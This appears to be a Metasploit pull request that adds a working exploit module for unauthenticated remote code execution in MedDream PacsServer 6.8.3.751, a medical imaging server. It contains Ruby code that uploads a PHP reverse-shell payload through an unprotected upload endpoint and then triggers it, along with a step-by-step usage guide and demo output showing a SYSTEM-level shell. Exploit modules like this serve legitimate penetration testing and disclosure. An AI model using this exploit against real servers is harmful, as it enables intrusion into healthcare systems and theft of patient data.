### PR TITLE
MedDream PacsServer Unauthenticated RCE

### DIFF
--- a/documentation/modules/exploit/windows/http/meddream_pacs_rce.md
+++ b/documentation/modules/exploit/windows/http/meddream_pacs_rce.md
@@ -1,19 +1,37 @@
-## Details
-This module exploits a vulnerability found in MedDream PacsServer 6.8.3.751, which allows unauthenticated attackers to perform Remote Code Execution via an arbitrary PHP file upload. Depending on how the web server is configured to run will determine what level of access privilege obtained.
+## Vulnerable Application
+This module exploits a vulnerability found in MedDream PacsServer, which
+allows unauthenticated attackers to perform Remote Code Execution via an
+aribitrary PHP file upload.  Depending on how the web server is configured to
+run will determine what level of access priviliged is obtained.
 
-## Verification
+The following version is known to vulnerable:
+
+* 6.8.3.751
+
+## Verification Steps
 List the steps needed to make sure this thing works
 
-- [ ] Start `msfconsole`
-- [ ] `use exploit/windows/http/meddream_pacs_rce`
-- [ ] `set rhosts <ip address of meddream pacs server>`
-- [ ] `check`
-- [ ] **Verify** that application is vulnerable
-- [ ] `set lhost <ip address of metasploit system>`
-- [ ] `exploit`
-- [ ] **Verify** that shell is returned
+1. Start `msfconsole`
+2. Do: `use exploit/windows/http/meddream_pacs_rce`
+3. Do: `set rhosts <ip address of meddream pacs server>`
+4. Do: `check`
+5. Verify that application is vulnerable via version check
+6. Do: `set lhost <ip address of metasploit system>`
+7. Do: `exploit`
+8. Verify that shell is returned via system commands: `whoami` or `ipconfig`
 
-## Demo
+## Options
+Path for web application is customizable upon installation.  Installation
+guide defaults to `/Pacs`
+
+Default Payload `php/reverse_php` is used for reliability
+
+## Scenarios
+
+### MedDream PacsServer 6.8.3.751 on Windows 2016
+
+Expected output:
+
 ```
 $ ./msfconsole -q
 msf6 > use exploit/windows/http/meddream_pacs_rce
@@ -50,6 +68,3 @@ Ethernet adapter Ethernet:
    Subnet Mask . . . . . . . . . . . : 255.255.0.0
    Default Gateway . . . . . . . . . : 192.168.254.254
 ```
-## Test Environment
-Tested against MedDream PacsServer 6.8.3.751 running on Windows 2016
-

--- a/documentation/modules/exploit/windows/http/meddream_pacs_rce.md
+++ b/documentation/modules/exploit/windows/http/meddream_pacs_rce.md
@@ -1,0 +1,55 @@
+## Details
+This module exploits a vulnerability found in MedDream PacsServer 6.8.3.751, which allows unauthenticated attackers to perform Remote Code Execution via an arbitrary PHP file upload. Depending on how the web server is configured to run will determine what level of access privilege obtained.
+
+## Verification
+List the steps needed to make sure this thing works
+
+- [ ] Start `msfconsole`
+- [ ] `use exploit/windows/http/meddream_pacs_rce`
+- [ ] `set rhosts <ip address of meddream pacs server>`
+- [ ] `check`
+- [ ] **Verify** that application is vulnerable
+- [ ] `set lhost <ip address of metasploit system>`
+- [ ] `exploit`
+- [ ] **Verify** that shell is returned
+
+## Demo
+```
+$ ./msfconsole -q
+msf6 > use exploit/windows/http/meddream_pacs_rce
+[*] Using configured payload php/reverse_php
+msf6 exploit(windows/http/meddream_pacs_rce) > set rhosts 192.168.0.223
+rhosts => 192.168.0.223
+msf6 exploit(windows/http/meddream_pacs_rce) > check
+
+[+] MedDream version 6.8.3 detected
+[*] 192.168.0.223:80 - The target appears to be vulnerable.
+msf6 exploit(windows/http/meddream_pacs_rce) > set lhost 192.168.20.100
+lhost => 192.168.20.100
+msf6 exploit(windows/http/meddream_pacs_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.20.100:4444
+[*] Uploading backdoor file: BeKzHyHnC.php
+[*] New filename on system: '20201016-132215--BeKzHyHnC.php
+[*] Trigging the exploit...
+[*] Command shell session 1 opened (192.168.20.100:4444 -> 192.168.0.223:50372) at 2020-10-16 13:22:15 -0400
+[!] Tried to delete 20201016-132215--BeKzHyHnC.php, unknown result
+
+whoami
+nt authority\system
+ipconfig
+
+Windows IP Configuration
+
+
+Ethernet adapter Ethernet:
+
+   Connection-specific DNS Suffix  . : foo.bar
+   Link-local IPv6 Address . . . . . : fe80::d125:4e8f:1f9d:4399%2
+   IPv4 Address. . . . . . . . . . . : 192.168.0.223
+   Subnet Mask . . . . . . . . . . . : 255.255.0.0
+   Default Gateway . . . . . . . . . : 192.168.254.254
+```
+## Test Environment
+Tested against MedDream PacsServer 6.8.3.751 running on Windows 2016
+

--- a/modules/exploits/windows/http/meddream_pacs_rce.rb
+++ b/modules/exploits/windows/http/meddream_pacs_rce.rb
@@ -1,0 +1,96 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'MedDream PacsServer Unauthenticated RCE',
+      'Description' => %q{
+        This module exploits a vulnerability found in MedDream PacsServer 6.8.3.751,
+        which allows unauthenticated attackers to perform Remote Code Execution
+        via an arbitrary PHP file upload.
+      },
+      'License' => MSF_LICENSE,
+      'Author' =>
+        [
+        'bzyo'
+        ],
+      'Platform' => 'php',
+      'References' =>
+          [
+            ['EDB', '48868'],
+          ],
+      'Arch' => ARCH_PHP,
+      'Targets' =>
+        [
+          [ 'Automatic', { } ],
+        ],
+      'DefaultOptions' => {
+        'PAYLOAD' => 'php/reverse_php',
+      },
+      'DisclosureDate' => 'Oct 10 2020',
+      'DefaultTarget' => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The path to attempt to application', '/Pacs/']),
+        OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']),
+        OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', ''])
+      ])
+  end
+  def check
+    url = normalize_uri(target_uri.path, "login.php")
+    res = send_request_cgi(
+        'method'  => 'GET',
+        'uri'     =>  url
+    )
+
+
+    if res.get_html_document.at('div[@id="footer"]').text.include? 'PACS-Premium 6.8.3'
+      print_good('MedDream version 6.8.3 detected')
+      return Exploit::CheckCode::Appears
+    elsif res.get_html_document.at('div[@id="footer"]').text.include? 'PACS-Premium '
+      print_status('MedDream detected, but not version 6.8.3')
+      return Exploit::CheckCode::Detected
+    end
+  end
+
+  def exploit
+    filename = rand_text_alpha(8 + rand(4)) + '.php'
+    dt =  DateTime::now
+    date =  dt.strftime('%Y%m%d')
+    time =  dt.strftime('%H%M%S')
+
+
+    data = Rex::MIME::Message.new
+    data.add_part('Attach', nil, nil, 'form-data; name="actionvalue"')
+    data.add_part(payload.encoded,'application/octet-stream',nil, "form-data; name=\"uploadfile\"; filename=\"#{filename}\"")
+    data.add_part('Attach', nil, nil, 'form-data; name="action"')
+
+    print_status("Uploading backdoor file: #{filename}")
+    fname = "#{date}-#{time}--#{filename}"
+    print_status("New filename on system: '#{fname}")
+    register_file_for_cleanup(fname)
+
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, "uploadImage.php"),
+      'ctype'    => "multipart/form-data;boundary=#{data.bound}",
+      'data'     => data.to_s
+     })
+
+    print_status("Trigging the exploit...")
+    send_request_cgi({
+      'method'  => 'GET',
+      'uri'     => normalize_uri(target_uri.path,"upload/" + fname)
+     }, 5)
+  end
+end


### PR DESCRIPTION
Adds a new module for Unauthenticated RCE on MedDream PacsServer

## Details
This module exploits a vulnerability found in MedDream PacsServer 6.8.3.751, which allows unauthenticated attackers to perform Remote Code Execution via an arbitrary PHP file upload. Depending on how the web server is configured to run will determine what level of access privilege obtained.

## Verification
List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/http/meddream_pacs_rce`
- [ ] `set rhosts <ip address of meddream pacs server>`
- [ ] `check`
- [ ] **Verify** that application is vulnerable
- [ ] `set lhost <ip address of metasploit system>`
- [ ] `exploit`
- [ ] **Verify** that shell is returned

## Demo
```
$ ./msfconsole -q
msf6 > use exploit/windows/http/meddream_pacs_rce
[*] Using configured payload php/reverse_php
msf6 exploit(windows/http/meddream_pacs_rce) > set rhosts 192.168.0.223
rhosts => 192.168.0.223
msf6 exploit(windows/http/meddream_pacs_rce) > check

[+] MedDream version 6.8.3 detected
[*] 192.168.0.223:80 - The target appears to be vulnerable.
msf6 exploit(windows/http/meddream_pacs_rce) > set lhost 192.168.20.100
lhost => 192.168.20.100
msf6 exploit(windows/http/meddream_pacs_rce) > exploit

[*] Started reverse TCP handler on 192.168.20.100:4444
[*] Uploading backdoor file: BeKzHyHnC.php
[*] New filename on system: '20201016-132215--BeKzHyHnC.php
[*] Trigging the exploit...
[*] Command shell session 1 opened (192.168.20.100:4444 -> 192.168.0.223:50372) at 2020-10-16 13:22:15 -0400
[!] Tried to delete 20201016-132215--BeKzHyHnC.php, unknown result

whoami
nt authority\system
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : foo.bar
   Link-local IPv6 Address . . . . . : fe80::d125:4e8f:1f9d:4399%2
   IPv4 Address. . . . . . . . . . . : 192.168.0.223
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 192.168.254.254
```
## Test Environment
Tested against MedDream PacsServer 6.8.3.751 running on Windows 2016